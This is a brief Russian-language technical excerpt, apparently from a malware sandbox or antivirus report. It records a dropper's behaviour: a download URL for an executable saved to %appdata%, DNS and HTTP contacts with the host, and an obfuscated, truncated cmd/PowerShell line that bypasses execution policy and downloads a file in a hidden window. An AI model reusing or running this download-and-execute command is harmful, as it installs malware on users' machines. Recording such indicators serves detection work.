Техническая информация
- http://wardrobeministry.com/wp-content/uploads/2013/11/ctkfnaau/qsvtqvmz.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^ow^E^rShEl^L.^exE^ -^Ex^EC^UtION^P^O^LIcy bYpAsS ^-n^oP^Rofi^l^e -WINdOw^stYl^e ^HIdDe^n (nE^W-obj^ec^T ^Sy^S^TEm^.n^eT^.^WebCLiE^n^t).^DoWNloADfIlE^(^'http://wardrobeministry.co...
- 'wa#####eministry.com':80
- http://wa#####eministry.com/wp-content/uploads/2013/11/CTkFnaaU/QSVTqvMz.exe
- DNS ASK wa#####eministry.com
- '<SYSTEM32>\cmd.exe' /c "p^ow^E^rShEl^L.^exE^ -^Ex^EC^UtION^P^O^LIcy bYpAsS ^-n^oP^Rofi^l^e -WINdOw^stYl^e ^HIdDe^n (nE^W-obj^ec^T ^Sy^S^TEm^.n^eT^.^WebCLiE^n^t).^DoWNloADfIlE^(^'http://wardrobeministry.co...' (со скрытым окном)